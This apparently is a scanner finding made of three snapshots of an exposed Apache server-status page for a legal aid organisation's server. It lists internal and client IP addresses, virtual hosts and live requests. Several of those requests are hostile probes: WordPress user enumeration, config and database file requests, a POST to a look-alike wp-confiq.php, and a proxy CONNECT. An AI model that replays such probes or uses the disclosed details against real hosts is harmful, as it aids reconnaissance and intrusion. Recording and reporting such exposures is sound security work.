SSReqConnChildSlotClientProtocolVHostRequest 0-5751230124/98/811796W 12.550027.04.7513441.33 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 1-575123060/35/788799_ 8.1414201140.02.4013051.86 70.132.4.80http/1.1events.atlantalegalaid.org:8080GET /config.json HTTP/1.1 2-575130600/25/757069_ 5.324300.01.2212907.80 70.132.1.135http/1.1short.alas.org:8080GET / HTTP/1.1 3-575131780/61/739193_ 9.1415800.03.7812381.08 3.134.148.59http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 4-575123000/70/719658_ 4.2714281120.01.9211863.65 70.132.4.80http/1.1events.atlantalegalaid.org:8080GET /_all_dbs HTTP/1.1 5-575123110/101/699048_ 9.112081320.01.9411541.60 3.134.148.59http/1.1atlantalegalaid.org:8080\n 6-575123120/84/659756_ 11.9614291190.013.4910874.18 70.132.4.80http/1.1events.atlantalegalaid.org:8080GET /v2/_catalog HTTP/1.1 7-575131870/90/634775_ 9.82411290.02.4510369.88 3.134.148.59http/1.1atlantalegalaid.org:8080\x16\x03\x01 8-575153000/21/602861_ 3.9224800.01.279788.69 3.134.148.59http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 9-575153050/19/583018_ 2.7714181560.00.919198.78 70.132.4.80http/1.1events.atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 10-575-0/0/514008. 0.00636900.00.008742.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-575-0/0/478408. 0.00636800.00.007890.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-575-0/0/414770. 0.00636700.00.006588.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-575-0/0/328442. 0.00636600.00.004782.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-575-0/0/289363. 0.00636500.00.004302.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-574-0/0/265129. 0.007286000.00.003777.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-574-0/0/230362. 4.637284900.00.003432.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-574-0/0/167580. 0.007285800.00.002335.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-574-0/0/145435. 0.007285700.00.002064.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-574-0/0/137594. 0.007285600.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-574-0/0/128258. 0.007285500.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-574-0/0/116729. 0.007285300.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-574-0/0/121130. 0.007285200.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-574-0/0/106104. 0.007285400.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-574-0/0/108735. 1.34373592620.00.001366.53 185.242.226.58http/1.1atlantalegalaid.org:8080\x16\x03\x01 25-567-0/0/86000. 0.0066110700.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00189226400.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00189226300.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00189226200.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00189226000.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00189226100.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00189225900.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82834394100.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00841533900.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15831345900.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0683317596620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23833175900.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00841537400.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00841537200.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32833175910080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00841537300.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00841537100.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00841537000.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00841536900.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00841536800.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00841536700.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001300770500.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001300770400.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001300770300.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001300770200.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001300770100.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001300770000.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001300769900.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001300769800.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001300769700.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001300769600.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.001300769500.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021f07b3c8e
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Wednesday, 05-Nov-2025 01:52:15 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 575 Parent Server MPM Generation: 574 Server uptime: 574 days 8 hours 57 minutes 41 seconds Server load: 0.00 0.00 0.00 Total accesses: 13749880 - Total Traffic: 195.4 GB CPU Usage: u285.44 s25.02 cu0 cs0 - .000626% CPU load .277 requests/sec - 4227 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers __.___W___.............._....................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-57474570/51/811658_ 6.60455300.02.2013436.00 18.68.41.39http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 1-57486660/59/788723_ 2.81511660.00.7413049.29 130.176.208.143http/1.1secure.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-574-0/0/757044. 5.151913300.00.0012906.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-57491350/40/739118_ 0.1943162340.00.2212376.58 130.176.187.246http/1.1elearning.alas.org:8080GET /theme/styles.php/boost/1564407846_1/all HTTP/1.1 4-57473880/41/719573_ 3.62431650.01.0111861.00 130.176.187.214http/1.1elearning.alas.org:8080GET /pluginfile.php/1/theme_boost/backgroundimage/1564407846/ci 5-57486710/24/698944_ 1.9540391780.00.4011539.58 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1762303488.108566045761108 6-574909525/37/659652W 0.180027.90.3010860.27 70.132.1.90http/1.1short.alas.org:8080GET /server-status HTTP/1.1 7-57491400/10/634672_ 0.10431600.00.0210366.90 130.176.187.214http/1.1elearning.alas.org:8080GET /theme/image.php/boost/core/1564407846/i/course HTTP/1.1 8-57491410/7/602832_ 0.4440395630.00.079787.10 15.158.40.136http/1.1atlantalegalaid.org:8080POST /wp-confiq.php HTTP/1.1 9-57491500/9/582979_ 0.59431650.00.169196.97 130.176.187.230http/1.1elearning.alas.org:8080GET /pluginfile.php/74/course/overviewfiles/1.png HTTP/1.1 10-574-0/0/514007. 0.001913700.00.008742.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-574-0/0/478407. 6.981912400.00.007890.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-574-0/0/414769. 5.881911000.00.006588.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-574-0/0/328441. 0.001913600.00.004782.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-574-0/0/289362. 5.111912500.00.004302.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-574-0/0/265129. 0.001913400.00.003777.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-574-0/0/230362. 4.631912300.00.003432.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-574-0/0/167580. 0.001913200.00.002335.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-574-0/0/145435. 0.001913100.00.002064.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-574-0/0/137594. 0.001913000.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-574-0/0/128258. 0.001912900.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-574-0/0/116729. 0.001912700.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-574-0/0/121130. 0.001912600.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-574-0/0/106104. 0.001912800.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-57491930/12/108726_ 0.33431610.00.131366.33 130.176.187.230http/1.1elearning.alas.org:8080GET /theme/image.php/boost/core/1564407846/moodlelogo_grayhat H 25-567-0/0/86000. 0.0060738000.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00183853700.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00183853600.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00183853500.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00183853300.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00183853400.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00183853200.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82829021500.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00836161200.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15825973300.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0682780326620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23827803200.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00836164700.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00836164500.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32827803210080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00836164600.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00836164400.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00836164300.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00836164200.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00836164100.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00836164000.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001295397900.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001295397800.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001295397700.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001295397600.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001295397500.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001295397400.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001295397300.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001295397200.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001295397100.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001295397000.0</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021f284236b
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 03-Nov-2025 11:20:34 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 574 Parent Server MPM Generation: 573 Server uptime: 572 days 18 hours 26 minutes 1 second Server load: 0.00 0.00 0.00 Total accesses: 13747828 - Total Traffic: 195.3 GB CPU Usage: u285.27 s24.77 cu0 cs0 - .000627% CPU load .278 requests/sec - 4236 B/second - 14.9 kB/request 1 requests currently being processed, 8 idle workers W____..._._._....._............................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-5732969625/43/811482W 4.490027.90.9513430.82 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 1-573296410/50/788437_ 3.28127910150.00.9113044.22 130.176.137.70http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 2-573304210/5/756790_ 0.8117981820.00.7212889.84 130.176.208.143http/1.1picturingjustice.org:8080GET / HTTP/1.1 3-573304300/52/738927_ 3.961254630.01.1612363.63 130.176.137.70http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 4-573304370/9/719428_ 0.88234810.00.2411848.15 3.172.73.43http/1.1elearning.alas.org:8080GET /lib/javascript.php/1564020885/lib/javascript-static.js HTT 5-572-0/0/698872. 1.543224800.00.0011537.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-572-0/0/659559. 0.001773200.00.0010858.25 173.239.240.9http/1.1 7-572-0/0/634623. 4.153225100.00.0010365.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-573296300/7/602680_ 0.5617972720.00.939783.80 130.176.208.143http/1.1picturingjustice.org:8080GET / HTTP/1.1 9-572-0/0/582867. 7.023225600.00.009184.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-573296290/48/513914_ 3.451785100.00.588729.37 130.176.208.143http/1.1picturingjustice.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 11-572-0/0/478315. 0.151773200.00.007888.19 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 12-573296350/14/414642_ 3.22101900.00.626565.27 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 13-572-0/0/328373. 0.003225000.00.004780.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-572-0/0/289321. 0.003224900.00.004301.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-572-0/0/265107. 0.003225200.00.003775.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-572-0/0/230322. 4.623225500.00.003431.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-572-0/0/167577. 3.563225400.00.002335.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-573296360/10/145428_ 2.4532911470.00.332064.19 70.132.4.80http/1.1atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 19-572-0/0/137591. 0.001773200.00.002103.38 173.249.217.7http/1.1 20-571-0/0/128255. 0.0017877700.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-571-0/0/116726. 0.0017877600.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-567-0/0/121127. 0.0046868400.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-567-0/0/106101. 0.0046868100.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-567-0/0/108712. 0.0046868300.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-567-0/0/86000. 0.0046868000.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00169983700.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00169983600.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00169983500.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00169983300.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00169983400.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00169983200.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82815151400.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00822291200.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15812103200.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0681393326620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23813933200.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00822294700.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00822294500.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32813933210080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00822294600.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00822294400.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00822294300.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00822294200.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00822294100.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00822294000.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001281527900.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001281527800.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001281527700.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001281527600.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001281527500.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001281527400.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001281527300.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001281527200.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001281527100.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001281527000.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.0012815269
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021d3c3d441
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 02-Nov-2025 23:54:44 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 573 Parent Server MPM Generation: 572 Server uptime: 572 days 7 hours 10 seconds Server load: 0.00 0.00 0.00 Total accesses: 13747373 - Total Traffic: 195.3 GB CPU Usage: u305.89 s26.56 cu0 cs0 - .000672% CPU load .278 requests/sec - 4240 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers _...._.__W_._...___............................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-572260240/14/811432_ 2.0425312700.00.8613429.79 206.168.34.219http/1.1atlantalegalaid.org:8080\x16\x03\x01 1-572-0/0/788382. 0.001342600.00.0013043.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-572-0/0/756775. 3.991342300.00.0012889.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-572-0/0/738869. 0.001342700.00.0012362.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-572-0/0/719415. 7.181342500.00.0011847.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-572260390/18/698861_ 1.5225081440.00.5111537.26 206.168.34.219http/1.1atlantalegalaid.org:8080\x16\x03\x01 6-572-0/0/659555. 7.031341800.00.0010858.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-572255660/34/634611_ 4.15250900.02.1710365.30 206.168.34.219http/1.1atlantalegalaid.org:8080GET /.well-known/security.txt HTTP/1.1 8-572255470/68/602666_ 5.183014140.01.789782.71 3.172.83.14http/1.1esign.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 9-5722555225/69/582852W 7.010027.93.659184.79 70.132.1.135http/1.1short.alas.org:8080GET /server-status HTTP/1.1 10-572225380/66/513852_ 10.718000.03.188728.77 36.255.98.47http/1.1atlantalegalaid.org:8080GET /manager/ HTTP/1.1 11-572-0/0/478309. 0.001342200.00.007888.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-572255750/72/414585_ 3.1925481810.01.036564.44 206.168.34.219http/1.1 13-572-0/0/328369. 1.701342800.00.004780.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-572-0/0/289318. 0.001342400.00.004301.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-572-0/0/265105. 0.001342100.00.003775.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-572255900/29/230315_ 4.61252400.01.613431.19 206.168.34.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 17-572260550/25/167533_ 3.53253900.01.402335.02 206.168.34.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 18-572260640/25/145410_ 4.7125232620.02.232063.84 206.168.34.219http/1.1atlantalegalaid.org:8080PRI * HTTP/2.0 19-571-0/0/137586. 0.0013762800.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-571-0/0/128255. 0.0013762700.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-571-0/0/116726. 0.0013762600.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-567-0/0/121127. 0.0042753300.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-567-0/0/106101. 0.0042753000.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-567-0/0/108712. 0.0042753200.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-567-0/0/86000. 0.0042752900.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00165868600.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00165868500.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00165868400.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00165868200.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00165868300.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00165868100.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82811036300.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00818176100.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15807988200.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0680981816620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23809818100.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00818179600.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00818179400.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32809818110080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00818179500.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 